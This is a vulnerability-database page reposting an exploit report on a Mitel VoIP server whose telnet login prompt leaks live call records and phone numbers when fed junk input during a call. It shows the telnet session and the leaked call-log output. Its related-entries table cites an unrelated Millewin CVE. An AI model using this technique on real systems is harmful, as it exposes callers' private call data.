Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Mitel mitel-cs018 - Call Data Information Disclosure Vulnerability

🗓️ 02 Dec 2020 00:00:00Reported by Andrea IntilangeloType 
zdt
 zdt🔗 0day.today👁 90 Views

Mitel mitel-cs018 - Call Data Information Disclosur

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2021-3394
8 Feb 202100:00
circl
CNNVD		Millennium Srl Millewin Security Breach
8 Feb 202100:00
cnnvd
CVE		CVE-2021-3394
9 Feb 202114:51
cve
Cvelist		CVE-2021-3394
9 Feb 202114:51
cvelist
Exploit DB		Millewin 13.39.146.1 - Local Privilege Escalation
8 Feb 202100:00
exploitdb
EUVD		EUVD-2021-26723
7 Oct 202500:30
euvd
NVD		CVE-2021-3394
9 Feb 202115:15
nvd
OSV		CVE-2021-3394
9 Feb 202115:15
osv
Packet Storm		Millewin 13.39.028 Unquoted Service Path / Insecure Permissions
8 Feb 202100:00
packetstorm
Prion		Privilege escalation
9 Feb 202115:15
prion
Rows per page
# Exploit Title: Mitel mitel-cs018 - Call Data Information Disclosure
# Exploit Author: Andrea Intilangelo (acme olografix / paranoici)
# Vendor Homepage: www.mitel.com
# Version: mitel-cs018
# Tested on: Windows, Linux

There is an interesting bug in a Mitel's servers for Voice over IP that allows to discover the numbers called and the numbers calling trought this dhcp server. This server is configurable via http interface and via telnet; in this case, if there is a call at moment of login/pass request, I've noted this:

Trying 192.168.1.2...
Connected to 192.168.1.2.
Escape character is '^]'. 
Username: mitel-cs018
Password: 
ERROR: Invalid Username/Password pair 
Username:
Password: 
Username: ^X^W^E^Q^W
Password: 
ERROR: Invalid Username/Password pair 
Username: Password: 
ERROR: Invalid Username/Password pair 
# in this moment a foreign call arrive from outside
Username: 155 OGIN 149        11:11:55                        D 2
156 ICIN            11:12: 6                        D 4 0xxxXxxxxx
157 XFIC 156        11:12: 6 151            0: 9:47 D 3
158 ICIN            11:12: 6                        D 3 0xxxXxxxxx
159 ANSW 146        11:12:11                0: 0: 9 D 4
160 HDIN 146        11:12:21                        D 4
162 HREC 146        11:12:27                0: 0: 6 D 4
163 ABND ?          11:12:37                0: 0:37 D 3 0xxxXxxxxx
164 ICIN            11:12:43                        D 3 0xxxXxxxxx
165 EXIC 146        11:12:54                0: 0:47 D 4
166 ANSW 146        11:13: 0                0: 0:16 D 3
167 HDIN 146        11:13: 6                        D 3
169 EXIC 146        11:13:13        156     0: 0:12 D 3
171 EXOG 149        11:13:46                0: 1:59 D 2 0xxXxxxxx
172 XFIC 156        11:16:53 146            0: 3:40 D 3 
# where "0xxXxxxxx" are telephone numbers
A derives table results is:
SEQ CODE  EXT   ACC   TIME     RX     TX   DURATION LN    DIALLED DIGITS   COST
No.       No.   COD HH:MM:SS  FROM    TO   HH:MM:SS No.
___ _____ ____ ____ ________  ____   ____  ____________   ______________  _______

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Dec 2020 00:00Current
8.9High risk
Vulners AI Score8.9
CVSS 26.5
CVSS 3.18.8
EPSS0.0086
mitelcall data disclosureinformationvulnerabilityvoice over ipsecuritydhcp serverhttp interfacetelnettelephone numbers
90